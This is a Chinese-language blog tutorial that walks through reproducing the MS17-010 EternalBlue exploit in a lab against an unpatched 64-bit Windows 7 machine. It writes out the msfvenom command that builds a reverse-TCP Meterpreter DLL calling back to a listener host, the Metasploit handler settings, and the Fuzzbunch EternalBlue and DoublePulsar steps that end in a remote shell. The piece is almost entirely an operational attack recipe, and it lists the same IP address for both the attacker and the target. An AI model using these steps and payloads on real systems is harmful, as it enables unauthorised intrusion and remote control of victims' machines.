ms17-010永恒之蓝漏洞利用

一.实验环境搭建

1.攻击机:一台32位windows 7虚拟机,需要安装32位python2.6, pywin32-212-py2.6.exe,shadowbroker工具包

ip:192.168.0.108

python2.6下载地址:https://www.python.org/download/releases/2.6/

ms17-010永恒之蓝漏洞利用_第1张图片

pywin32-212-py2.6下载地址:https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

ms17-010永恒之蓝漏洞利用_第2张图片点击后会跳转页面等几秒才会弹出下载

shadowbroker工具包下载:https://github.com/misterch0c/shadowbroker,直接下载解压就可以了

2.辅助机:一台kail liunx虚拟机(用于生成dell文件和进行监控)                           ip:192.168.0.109

3.靶机:一台没有打补丁的64位windows 7,打开445端口                                     ip:192.168.0.108

二.骚操作开始了

1.利用kail liunx生成dll文件,在终端输入,msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=4444 -f dll > DarkHQ.dll     (注:这里靶机是64位的所以必须要加x64,msf默认的居然是生成32位的,小伙子在这里被坑了下)

ms17-010永恒之蓝漏洞利用_第3张图片

2.打开神器metasploit,命令msfconsole

ms17-010永恒之蓝漏洞利用_第4张图片

3.设置一些相关的参数(尽量别复制,多用tab补全这样不容易出错)

use exploit/multi/handler    使用监听模块

set payload windows/x64/meterpreter/reverse_tcp   设置payload(注:还是注意靶机是64的,记得设置x64)

set LHOST 192.168.0.109     设置本地ip

set LPORT 4444                  设置端口(必须和生成dll文件的端口一致)

ms17-010永恒之蓝漏洞利用_第5张图片

4.查看配置是否有错,show options

ms17-010永恒之蓝漏洞利用_第6张图片

5.运行,exploit

6.复制我们刚刚生成的dll文件到攻击机32位win7的c盘根目录下

ms17-010永恒之蓝漏洞利用_第7张图片

7.打开解压后的shadowbroker工具包,在windows目录下新建文件夹listeningposts,并且修改Fuzzbunch.xml里的ResourcesDir和LogDir成所对应的路径,小伙子这里是放到桌面的

ms17-010永恒之蓝漏洞利用_第8张图片

ms17-010永恒之蓝漏洞利用_第9张图片

8.在工具包里windwos目录下运行fb.py文件(过程有点烦,小伙子圈起来没有文字地方就可以直接回车)

ms17-010永恒之蓝漏洞利用_第10张图片

8.指定好攻击目标后

ms17-010永恒之蓝漏洞利用_第11张图片

9.一路回车

ms17-010永恒之蓝漏洞利用_第12张图片

10.这里记得选择1,选择FB

ms17-010永恒之蓝漏洞利用_第13张图片

11.然后一直回车,可以看到后门生成成功了

ms17-010永恒之蓝漏洞利用_第14张图片

12.使用doublepulsar这个模块,use doublepulsar

ms17-010永恒之蓝漏洞利用_第15张图片

13.一路回车到切换电脑配置信息

ms17-010永恒之蓝漏洞利用_第16张图片

14.一直回车到底,看见已经成功了

ms17-010永恒之蓝漏洞利用_第17张图片

15.返回kail liunx查看,成功的拿下

ms17-010永恒之蓝漏洞利用_第18张图片


感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!

你可能感兴趣的:(漏洞复现)